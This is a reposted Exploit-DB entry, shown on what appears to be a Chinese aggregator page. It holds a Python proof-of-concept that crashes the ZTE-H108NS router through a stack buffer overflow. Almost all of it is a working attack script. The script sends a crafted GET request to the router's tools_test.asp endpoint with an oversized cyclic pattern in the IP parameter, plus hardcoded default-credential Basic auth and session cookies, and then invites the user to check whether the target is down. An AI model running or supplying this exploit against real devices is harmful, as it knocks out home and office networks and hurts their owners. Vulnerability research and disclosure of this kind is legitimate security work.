Router ZTE-H108NS – Stack Buffer Overflow (DoS)

• Exploit Database
• 21 阅读

• 作者： George Tsimpidas
  日期： 2023-03-30
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51137/

• # Exploit Title: ZTE-H108NS -Stack Buffer Overflow (DoS)
  # Date: 19-11-2022
  # Exploit Author: George Tsimpidas 
  # Vendor: https://www.zte.com.cn/global/
  # Firmware: H108NSV1.0.7u_ZRD_GR2_A68
  # Usage: python zte-exploit.py <victim-ip> <port>
  # CVE: N/A 
  # Tested on: Debian 5.18.5
  
  #!/usr/bin/python3
  
  
  import sys
  import socket
  from time import sleep
  
  host = sys.argv[1]# Recieve IP from user
  port = int(sys.argv[2])# Recieve Port from user
  
  junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
  * 5
  
  
  buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"
  + junk + b"&TestBtn=START HTTP/1.1\r\n"
  buffer += b"Host: 192.168.1.1\r\n"
  buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)
  Gecko/20100101 Firefox/91.0\r\n"
  buffer += b"Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
  buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
  buffer += b"Accept-Encoding: gzip, deflate\r\n"
  buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
  buffer += b"Connection: Keep-Alive\r\n"
  buffer += b"Cookie:
  SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;
  _TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
  buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"
  
  
  
  
  print("[*] Sending evil payload...")
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.send(buffer)
  sleep(1)
  s.close()
  print("[+] Crashing boom boom ~ check if target is down ;)")